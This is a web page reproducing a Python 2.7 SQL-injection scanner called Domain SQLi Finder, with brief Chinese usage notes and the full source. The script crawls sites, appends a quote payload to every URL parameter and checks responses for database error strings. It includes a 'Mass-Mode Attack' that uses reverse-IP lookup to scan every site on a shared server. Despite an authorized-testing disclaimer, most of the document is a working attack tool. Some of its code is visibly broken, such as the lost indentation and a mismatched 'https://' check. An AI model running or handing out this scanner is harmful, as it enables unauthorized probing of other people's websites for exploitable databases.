Domain SQL Injector
程序员文章站
2022-07-10 10:29:53
Domain SQL Injector是一款SQL注入扫描工具,与以往工具不同的是它是扫描名同一服务器上的所有主机是否存在SQL注入漏洞,并将扫描结果以日志记录的方式保存下来。...
Domain SQL Injector是一款SQL注入扫描工具,与以往工具不同的是它是扫描名同一服务器上的所有主机是否存在SQL注入漏洞,并将扫描结果以日志记录的方式保存下来。
# ./Domain-SQLi-finder.py
Script Help
./Domain-SQLi-finder.py -h
针对单一网站攻击
./Domain-SQLi-finder.py --verbose 1 --url demo.testfire.net --crawl 50 --pages 5 --output testfire-SQLi.txt
它爬全部或请求数量的页面,发现注射链接,发现injecatable参数和测试SQL对每个注射参数
针对整个域
# ./Domain-SQLi-finder.py --verbose 1 --durl demo.testfire.net --crawl 50 --pages 5 --sites 4 --vulsites 2 --output testfire-SQLi.txt
Domain-SQLi-finder.py :
#!/usr/local/bin/python2.7
# This was written for a Penetration Test assessment and is for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing only!
import chilkat, sys, os, argparse, httplib, urlparse, urllib2, re, time, datetime
import DomainReverseIPLookUp
# The following three variables get their values from command line args, either take user value or stick with the default ones
pagesToCrawl = "" # Number of pages to crawl in a website
maxVulInjectableParam = "" # Maximum number of vulnerable pages (parameters) to find
output = "" # Output file name - append mode (a)
reverseLookUp = "DSQLiReverseLookUp.txt" # Output file name for reverseIP lookup - write+ mode (w+)
crawlDump = 'DSQLiCrawlerOutput.txt' # Stores crawling result for current crawl only - write+ mode (w+)
uniqueLinksDump = 'DSQLiUniqueLinks.txt' # Stores crawling result for current scan only - write+ mode (w+)
errorDump = 'DSQLiErrorDump.txt' # Dumps handled errors - append mode (a)
sitesToScan = "" # Stores maximum number of sites to scan on domain in case of Mass-Mode Attack
maxVulSites = "" # Stores maximum number of vulnerable sites to find with Mass-Mode Attack
reverseFlag = 0 # Determines whether reverseLookUp file is generated by script or user supplies it
maxVulSitesFlag = 0 # Keeps track of how many vulnerable sites have been found in Mass-Mode Attack
verbose = 0 # Determines what messages to display on screen (0 or 1)
sqlPayload = ["1'"] # SQL Payloads, add in more here
sqlErrors = [
"Warning",
"mysql_fetch_array()",
"mysql_fetch_object()",
"mysql_num_rows()",
"mysql_free_result()",
"mysql_real_escape_string()",
"mysql_connect()",
"mysql_select_db()",
"mysql_query()",
"You have an error in your SQL syntax",
"Unclosed quotation mark after the character string",
"Server Error in '/' Application",
"Microsoft OLE DB Provider for ODBC Drivers error",
"supplied argument is not a valid OCI8-Statement",
"microsoft jet database engine"
] # add in more here
# Determine platform and clear screen
def clear_screen():
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
os.system('clear')
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
os.system('cls')
else:
pass
# Banner - Set the formatting mororn, it's fucked up atm
def banner():
print """
##################################################################
Domain SQLi Finder - (Error Based Tool-v0.1)
b0nd@garage4hackers.com
Greetz to:
(www.garage4hackers.com)
GGGGGG\
GG __GG\
GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\
GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\
GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee |
GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____|
\GGGGGG |\\aaaaaaa |rr | \\aaaaaaa |\ggggggg |\\eeeeeee\
\______/ \_______|\__| \_______| \____gg | \_______|
gg\ gg |
gggggg |
\______/
###################################################################
"""
print "\tUsage: python %s [options]" % sys.argv[0]
print "\t\t-h help\n"
call_exit()
def call_exit():
print "\n\tExiting ...........\n"
sys.exit(0)
# Tests SQLi on all unique links and parameters by appending sqlPayload and checking the source
def check_SQLi(uniqueUrls):
sqliUrls = [] # This list will contain sorted URLs ready to be appended with sqlPayloads
flag = 0 # Variable to check whether desired 'n' number of vulnerable pages have been found
for link in uniqueUrls: # This list has all unique URLs but since a single unique URL might have multiple parameters
num = link.count("=") # so this loop prepares URLs with one parameter each
if num > 0:
for x in xrange(num):
x = x + 1
url = link.rsplit("=",x)[0]+"="
sqliUrls.append(url)
sqliUrls = list(set(sqliUrls)) # By now this list has all injectable parameters ready to append sqlPayload
parsed = urlparse.urlparse(link) # Later used to obtain website name
now = datetime.datetime.now() # Current time of scanning to put in DSQLiResults output file
try:
fd_output = open(output, 'a')
fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file
except IOError:
print "\n\t[!] Error - could not open|write file %s \n" % output
if verbose == 1:
print "\n[*] Testing SQLi on following URLs:"
for link in sqliUrls:
print "\t[-] URL: ", link
else:
print "\n[*] Testing SQLi on URL's ....."
# In the following loop, the counter flag plays role to find 'n' number of vulnerable pages. If limited number of pages
# have to be found, the value of flag counter determines whether script has found those number of pages or not. Once matches,
# it breaks all loops and come out. Else, if it has not touched the limit but links in sqliUrls have finished, control comes
# out of all loops. But if (0) i.e. all pages have to be found, flag plays no considerable role other than incrementing itself.
for link in sqliUrls:
for pload in sqlPayload:
if verbose == 1:
print "\n\n\tTesting: %s\n" % (link+pload)
try:
source = urllib2.urlopen(link+pload).read() # Appending sqlPayload and reading source for errors
except urllib2.HTTPError, err:
if err.code == 500:
if verbose == 1:
print "\t\t[!] Error - HTTP Error 500: Internal Server Error"
print "\t\t[-] Continuing with next link"
continue
else:
if verbose == 1:
print "\t\t[!] Error - HTTP Error xxx"
print "\t\t[-] Continuing with next link"
continue
for errors in sqlErrors:
if re.search(errors, source) != None: # If any sql error found in source
fd_output.write("\t\t[!] BINGO!!! SQLi Vulnerable " + link+pload + "\n")
print "\n\t\t[!] BINGO!!! - SQLi FOUND in: %s (%s) \n" % (link+pload, errors)
if maxVulInjectableParam != 0: # i.e. if 'n' number of vulnerable parameters have to be found
if flag < maxVulInjectableParam:
flag = flag + 1
else:
break
else: # i.e if all vulnerable pages have to be found
flag = flag + 1
break
else:
if verbose == 1:
print "\t\t[-] Not Vulnerable - String (%s) not found in response" % errors
else:
pass
if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found
break
if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found
break
if flag != 0:
print "\n\t[-] Target is vulnerable to SQLi, check log file"
print "\t\t[-] %d injectable vulnerable parameters found" % (flag)
global maxVulSitesFlag
maxVulSitesFlag = maxVulSitesFlag + 1 # Increment the flag which determines how many vulnerable sites to find in case of Mass-Mode Attack
else:
print "\n\t[-] Target is not vulnerable to SQLi"
try:
fd_output.write("\t\tTarget is not vulnerable to SQLi attack\n")
fd_output.close() # Close the file on completion of each URL, so that log file could be seen for
except IOError: # result instantly, instead of waiting for whole script to finish
print "\n\t[!] Error - file I/O error\n"
try:
fd_output.close()
except IOError:
pass
# Just finds the unique URLs from all crawled URLs and saves to list
# Concept is: Parse the URL, find its injectable parameter(s), check the combination of [netlock, path and injectable parameters] with earlier found
# combinations, if unique, update our uniqueUrls list else goto next URL and parse it for same procedure
def unique_urls(unsortedUrls):
print "\n[*] Finding unique URL's ....."
list_db = [] # Used as temporary storage to compare parameters with already found ones
uniqueUrls = [] # This one will finally have unique URLs in it
for link in unsortedUrls:
list_tmp = [] # Temporary list to store query parameters only
try:
parsed = urlparse.urlparse(link)
num = parsed.query.count("=") # Just checking the parsed.query portion for number of injectable parameters it has
x = 0
for x in xrange(num):
list_tmp.append(parsed.query.split("&")[x].rsplit("=",1)[0]) # list_tmp would have all injectable parameters in it as elements
x = x + 1
except IndexError:
# In my case links generate error bcoz they include an external URl and increase the number of "=" in link.
# accordingly the loop run 1 extra time and generates out of index error
if verbose == 1:
print "\n\t[!] Error - List Index Out of Order - check %s and report to author" % (errorDump)
try:
fd_errorDump = open(errorDump, 'a')
fd_errorDump.write("\n\t[*] Error occured inside unique_urls function for:\t" + parsed.query)
except IOError:
print "\n\t[!] Error - could not open|write file %s \n" % errorDump
continue
list_tmp = [parsed.netloc, parsed.path, list_tmp]
if list_tmp in list_db: # For the first URL, this condition would definitely fail as list_db is empty
continue # i.e. same parameters but with different values have been found, so continue
else:
list_db.append(list_tmp) # Update the found unique parameters
uniqueUrls.append(link) # Update the List with unique complete URLs
if verbose == 1:
for link in uniqueUrls:
print "\t[-] Unique link found: ", link
try:
fd_uniqueLinkDump = open(uniqueLinksDump, 'a')
for link in uniqueUrls:
fd_uniqueLinkDump.write(link + '\n')
fd_uniqueLinkDump.close()
except IOError:
print "\n\t[!] Error - could not open|write file %s \n" % uniqueLinksDump
check_SQLi(uniqueUrls) # Call SQLi check function to test SQLi vulnerability
# Function crawls to find "linksToCrawl" number of pages from URL.
# It stops when limit reaches or no more pages left to crawl, which ever meets the condition first
def crawl_site(url):
print "[*] Attacking URL -> ", url
print "\t[*] Crawling %s to find injectable parameters" % url
spider = chilkat.CkSpider() # Using Chilkat Library. Some modules are free.
spider.Initialize(url)
spider.AddUnspidered(url)
spider.CrawlNext()
print "\n\t[-] Website Title: ", spider.lastHtmlTitle()
print "\n\t[-] Crawling Pages", # The trailing comma to show progress bar in case of non-verbose
crawlerOutput = [] # This list would have all the linksToCrawl number of pages of URL
for i in range(0,int(pagesToCrawl)):
success = spider.CrawlNext()
if (success == True):
if verbose == 1:
if i%50 == 0:
print "\n[-] %d percent of %d pages to crawl complete\n" % ((i*100)/pagesToCrawl, pagesToCrawl)
print "\t", spider.lastUrl()
else:
sys.stdout.flush()
print ".", # In non verbose case, it prints dot dot dot to show the progress
crawlerOutput.append(spider.lastUrl())
else:
if (spider.get_NumUnspidered() == 0):
print "\n\t[-] No more URLs to spider"
i = i - 1 # Need to decrement, else gives +1 count for total pages crawled
break
else:
print spider.lastErrorText()
continue
spider.SleepMs(10)
try:
fd_crawlDump = open(crawlDump, 'a') # Logs
for link in crawlerOutput:
fd_crawlDump.write(link + '\n')
fd_crawlDump.close()
except IOError:
print "\n\t[!] Error - could not open|write file %s \n" % crawlDump
print "\n\t[-] Crawled %d pages successfully" % (i+1)
if verbose == 1:
print "\n[*] Parsing URL's to collect links with '=' in them ....."
urlsWithParameters = [] # This list would have only those URLs which has '=' in them i.e. injectable parameter(s)
for link in crawlerOutput:
if link.count("=") > 0:
urlsWithParameters.append(link)
if urlsWithParameters != []:
if verbose == 1:
print "\t[-] Done"
unique_urls(urlsWithParameters) # Time to find unique URLs among all with '=' in them
else:
print "\n\t[!] No injectable parameter found"
now = datetime.datetime.now() # Current time to put in DSQLiResults output file
try:
parsed = urlparse.urlparse(url)
fd_output = open(output, 'a')
fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file
fd_output.write("\t\tNo injectable parameter found\n")
fd_output.close()
except IOError:
print "\n\t[!] Error - could not open|write file %s \n" % output
# Function tries to find SQLi on sites on shared hosting
def attack_Domain(durl):
sites = []
counter = 0 # This keeps check on how many sites have been scanned so far
deadLinks = 0 # This keeps check on how many dead links have been found
print "\n[*] Attacking Domain -> ", durl
if reverseFlag == 0: # i.e. if --reverse switch is not used on console. That means, do reverseIP Lookup and generate result
DomainReverseIPLookUp.generate_reverse_lookup(durl, reverseLookUp, verbose) # pass domain url, output file name and verbose level
try:
fd_reverseLookUp = open(reverseLookUp, 'r')
for url in fd_reverseLookUp.readlines():
sites.append(url) # List sites contains all the domains hosted on server
except IOError:
print "\n\t[!] Error - %s file missing" % reverseLookUp
print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website"
call_exit()
elif reverseFlag == 1: # i.e. if --reverse switch is mentioned, then don't do reverse IP Lookup and read data from already generated file
try:
fd_reverseLookUp = open(reverseLookUp, 'r')
for url in fd_reverseLookUp.readlines():
sites.append(url) # List sites contains all the domains hosted on server
except IOError:
print "\n\t[!] Error - %s file missing" % reverseLookUp
print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website"
call_exit()
if len(sites)%10 != 0:
sites = sites[0:(len(sites)%10)]
else:
sites = sites[0:((len(sites)+2)%10)]
for site in sites:
try:
print "\n\t#################################################"
print "\n\t [-] Number of alive sites scanned so far: ", counter
print "\n\t [-] Number of vulnerable sites found so far: ", maxVulSitesFlag
print "\n\t [-] Number of dead sites found so far: ", deadLinks
print "\n\t#################################################\n"
if maxVulSites != 0: # i.e. if not all vulnerable sites are to be found
if maxVulSitesFlag == maxVulSites:
print "\n\t[-] Stopping scan - the required number of vulnerable sites have been found"
break
if site[:7] != "https://": # prepend https:// to url, if not already done by user
site = "https://" + site # what about https site?
site = site[:-1] # remove \n at the end of each element
print "-"*80
print "\n[*] Target URL - %s ....." % (site) # Verify URL for its existance
if verify_URL(site) == True: # Function call to verify URL for existance
print "\t[-] URL Verified\n"
crawl_site(site) # Pass the site to crawl function
else:
print "\n\t[-] URL %s could not be verified, continuing with next target in list" % site
deadLinks = deadLinks + 1
continue
except KeyboardInterrupt:
decision = raw_input("\n\t[?] how do you want to proceed? [(C)ontinue with next target in list or (q)uit]: ")
if decision == 'C' or decision == 'c':
continue
elif decision == 'q':
print "\n[!] Error - user aborted"
call_exit()
else:
print "\n\tEnjoy: oo=========> (|)"
call_exit()
counter = counter + 1 # Counting for only those sites which really got scanned
# for those whose URLs couldn't be verified, not incrementing counter
print "\n\n[*] Scanning Finished"
print "\n\t[-] Total Number of vulnerable sites found in domain: ", maxVulSitesFlag
print "\t[-] Check log file %s for result" % output
# Function to verify URL is alive and accessible
def verify_URL(url):
good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY] # 200, 302, 301 respectively
host, path = urlparse.urlparse(url)[1:3] # elems [1] and [2] - netloc and path
try:
conn = httplib.HTTPConnection(host)
conn.request('HEAD', path)
status = conn.getresponse().status
conn.close()
except StandardError:
status = None
return status in good_codes # Either 'True' or 'False'
# Parse command line arguments, allowed combinations and mandatory values
def parseArgs():
parser = argparse.ArgumentParser(description = 'Domain SQLi Finder - Error Based Tool v0.1', epilog="Report bugs to b0nd@garage4hackers.com | www.garage4hackers.com")
parser.add_argument('--verbose', nargs='?', dest='verbose', default=0, help='set verbosity [0 (default) : Off | 1 : On]', type=int)
parser.add_argument('--output', metavar='output.txt', dest='siteOutput', default='DSQLiResults.txt', help='output file to store results in (default=DSQLiResults.txt)')
group1 = parser.add_argument_group('Single-Mode Attack: Target One Site on Domain')
group1.add_argument('--url', nargs=1, dest='URL', help='target site to find SQLi')
group1.add_argument('--crawl', nargs='?', dest='crawl', default=500, help='number of pages to crawl (default=500)', type=int)
group1.add_argument('--pages', nargs='?', dest='pages', default=0, help='number of vulnerable pages (injectable parameters) to find in site (default=0 i.e. all)', type=int)
# Mind it - In group1 and group2, same paramters "crawl" and "pages" are used. So on console whether uses --crawl or --dcrawl,
# they would update the same variable "crawl" and ultimately the global variable pagesToCrawl. Same goes for "pages"
group2 = parser.add_argument_group('Mass-Mode Attack: Target All Sites on Domain')
group2.add_argument('--durl', nargs=1, dest='DURL', help='target domain to find SQLi')
group2.add_argument('--sites', nargs='?', dest='sites', default=0, type=int, help='number of sites to scan on domain (default=0 i.e. all)')
group2.add_argument('--vulsites', nargs='?', dest='vulsites', default=0, type=int, help='number of vulnerable sites to find on domain (default=0 i.e. all possible)')
group2.add_argument('--dcrawl', nargs='?', dest='crawl', default=500, type=int, help='number of pages to crawl in each site (default=500)')
group2.add_argument('--dpages', nargs='?', dest='pages', default=0, type=int, help='number of vulnerable pages (injectable parameters) to find in each site (default=0 i.e. all)')
group2.add_argument('--reverse', metavar='output.txt', nargs=1, dest='reverseLookUp', help='output file to store found sites on server and|or read Reverse IP Lookup results from file')
args = parser.parse_args()
# Check exclusiveness of options
if (args.URL != None and args.DURL != None):
print "\n\t[!] Error - Mutually exclusive options (--url, --durl)"
call_exit()
# Check existance of at least one option
if (args.URL == None and args.DURL == None):
print "\n\t[!] Error - No mode selected (--url, --durl)"
call_exit()
# Check if value is passed to args. e.g. --crawl without value would pass "None" to it and program would crash
# all of these switches have default value, so user either don't mention them on command prompt or must put a value for them
if (args.crawl == None or args.pages == None or args.sites == None or args.vulsites == None):
print "\n\t[!] Error - Insufficient number of value(s) passed to argument(s)"
call_exit()
# Check to make sure numeral value of vulsites is less than sites and pages < crawl
if args.sites < args.vulsites:
print "\n\t[!] Error - kidding? --sites shall be > --vulsites\n"
call_exit()
elif args.crawl < args.pages:
print "\n\t[!] Error - kidding? --(d)crawl shall be > --(d)pages\n"
call_exit()
# Check if switch --reverse is used with --durl only
if ((args.URL != None) and (args.reverseLookUp != None)):
print "\n\t[!] Error - '--reverse' switch goes with Mass-Mode (--durl) attack only"
call_exit()
global reverseLookUp # Declaring it here as it's been used couple of times in this fuction
# Check verbosity (--verbose argument)
if args.verbose != None: # It would be none only when mentioned without any value i.e. --verbose <no value>
if args.verbose == 1: # and if that is the case, the global value of verbose is 0 already, so - verbose off
print "\n[*] Verbose Mode On"
global verbose # verbose global variable
verbose = 1
if args.URL != None: # Verbose mode for --url
print "\t[-] Pages to crawl (default=500): ", (args.crawl)
print "\t[-] Vulnerable injectable parameters (pages) to find in site (default=0 i.e. all): %d" % (args.pages)
print "\t[-] Output file name: %s" % (args.siteOutput)
if args.DURL != None: # Verbose mode for --durl
print "\t[-] Number of sites to scan on domain (default=0 i.e all): ", (args.sites)
print "\t[-] Number of vulnerable sites to find on domain (default=0 i.e. all possible): ", (args.vulsites)
print "\t[-] Pages to crawl in each site (default=500): ", (args.crawl)
print "\t[-] Vulnerable injectable parameters (pages) to find in each site (default=0 i.e. all): %d" % (args.pages)
if args.reverseLookUp != None: # i.e. if on console the reverse.txt file names is mentioned
print "\t[-] Reverse IP Look-up file needed to read domains from: %s" % (args.reverseLookUp[0])
else:
print "\t[-] Reverse IP Look-up output file: %s" % reverseLookUp
print "\t[-] Final result output file: %s" % (args.siteOutput)
else: # i.e. if value 0 is passed to --verbose
print "\n[*] Verbose Mode Off"
else: # i.e. verbose has None Value, it's been passed without value
print "\n[*] Vebose Mode Off (by default)"
# By this point, either of --url, --durl or --aurl switch is enable
# Following assignments are for --url, --durl - see if you wish to put only relevant one and take rest in if args.DURL != None
# It's OK with current "common" crawl and pages parameters. If I assign parameter separately for --url and --durl then first I
# would need to define "dcrawl" and "dpages" and use them in combination with --durl
global pagesToCrawl
pagesToCrawl = args.crawl
global maxVulInjectableParam
maxVulInjectableParam = args.pages
global output
output = args.siteOutput
global sitesToScan
sitesToScan = args.sites
global maxVulSites
maxVulSites = args.vulsites
# Single-Mode Attack (--url argument)
if args.URL != None:
if args.URL[0][:7] != "https://": # prepend https:// to url, if not already done by user
args.URL[0] = "https://"+args.URL[0] # what about https site?
print "\n[*] Verifying URL....." # Verify URL for its existance
if verify_URL(args.URL[0]) == True: # Function call to verify URL for existance
print "\t[-] URL Verified\n"
crawl_site(args.URL[0]) # Goto the function which deals with 1 URL
else:
print "\n\t[-] URL cound not be verified."
call_exit()
# Mass-Mode Attack (--durl argument)
elif args.DURL != None:
if args.DURL[0][:7] != "https://":
args.DURL[0] = "https://"+args.DURL[0]
# reverseLookUp doesn't have default value, so if not mentioned on console, it will be None. If not None, that means user wants to read reverse look-up
# which is already generated file, either using this code or copied from somewhere. In that case, i/p file must reside in same directory
if args.reverseLookUp != None:
reverseLookUp = args.reverseLookUp[0]
global reverseFlag # Determines whether reverseLookUp file is generated by script or user supplies it
reverseFlag = 1
attack_Domain(args.DURL[0])
else: # i.e. --reverse is not mentioned on command prompt. Our code shall generate one.
print "\n[*] Verifying Domain - %s ....." % (args.DURL[0])
if verify_URL(args.DURL[0]) == True:
print "\t[-] Domain Verified\n"
attack_Domain(args.DURL[0])
else:
print "\n\t[-] Domain cound not be verified."
call_exit()
def main():
#clear_screen()
if len(sys.argv) < 2:
banner()
parseArgs() # Parse command line arguments
call_exit()
# ---------------------------------------- Code execution starts here -------------------------------------
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print "\n[!] Error - user aborted"
call_exit()